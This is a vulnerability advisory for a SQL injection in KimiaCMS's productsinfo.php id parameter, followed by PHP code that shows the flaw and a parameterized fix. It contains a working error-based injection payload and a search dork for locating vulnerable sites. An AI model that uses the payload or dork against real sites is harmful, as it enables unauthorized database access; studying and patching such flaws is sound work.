+-------------------------------+------------------------------+
KimiaCMS ("productsinfo.php?id=") SQL Injection Vulnerability

Author: R3VAN_BASTARD (walkingdead@anotherdayanothercity.com)
HomePage: INDONESIA RAYA - JOGJA - WARUNG BOTO
+-------------------------------+------------------------------+
[X] VENDOR: http://www.kimia.co.za/
[X] DOWNLOAD: $$$
[X] Vulnerability: SQL INJECTION
[X] DORK: "Graphic design & Web design by Kimia"
+-------------------------------+------------------------------+
FILE: http://localhost/productsinfo.php?id=NULL

Error in sql statement! You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
SQL = UPDATE `catalogue-product-item` SET `number-of-views` = `number-of-views` + 1 WHERE id = NULL\'

EXPLOIT:
http://localhost/productsinfo.php?id=NULL AND (SELECT 1227 FROM(SELECT COUNT(*),CONCAT(CHAR(58,118,118,97,58),(SELECT (CASE WHEN (1227=1227) THEN 1 ELSE 0 END)),CHAR(58,118,113,101,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
+-------------------------------+------------------------------+
Thanks To: My Wife Listo.hurt - All my friends
+-------------------------------+------------------------------+
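The leaked statement shows the view counter splicing the raw id parameter into an UPDATE and echoing the database error, which is exactly what the error-based payload above relies on. The following is an added illustration, not KimiaCMS code: it reproduces that pattern beside a hardened form that validates the id as an integer, binds it as a parameter, and never returns the SQL text or driver error to the client. Table and column names are taken from the advisory's error output; the `$pdo` connection is assumed.

```php
<?php
// Added example, not the vendor's code. Assumes $pdo is a PDO connection to
// the CMS database, configured to raise exceptions on errors:
//   $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);

// Pattern implied by the leaked SQL: the raw request value is concatenated in.
// With id=NULL\' the statement ends in "WHERE id = NULL\'" and MySQL reports
// the syntax error shown in the advisory, together with the full statement.
function bumpViewsUnsafe(PDO $pdo, string $rawId): void
{
    $sql = "UPDATE `catalogue-product-item` "
         . "SET `number-of-views` = `number-of-views` + 1 "
         . "WHERE id = " . $rawId;
    $pdo->exec($sql);
}

// Hardened form: reject anything that is not a positive integer up front, then
// bind the value so it can never alter the statement's structure.
function bumpViewsSafe(PDO $pdo, string $rawId): bool
{
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return false; // invalid id: no query is sent at all
    }
    $stmt = $pdo->prepare(
        'UPDATE `catalogue-product-item` '
      . 'SET `number-of-views` = `number-of-views` + 1 '
      . 'WHERE id = :id'
    );
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->rowCount() === 1; // false when no product has that id
}

// Request handling: log database failures server-side and answer generically,
// so neither the SQL text nor the MySQL error message reaches the client.
try {
    if (!bumpViewsSafe($pdo, $_GET['id'] ?? '')) {
        http_response_code(404);
        exit('Product not found.');
    }
} catch (PDOException $e) {
    error_log('productsinfo view counter failed: ' . $e->getMessage());
    http_response_code(500);
    exit('An error occurred.');
}
```

Removing the verbose error page on its own only hides the symptom; the parameterized statement is what closes the injection.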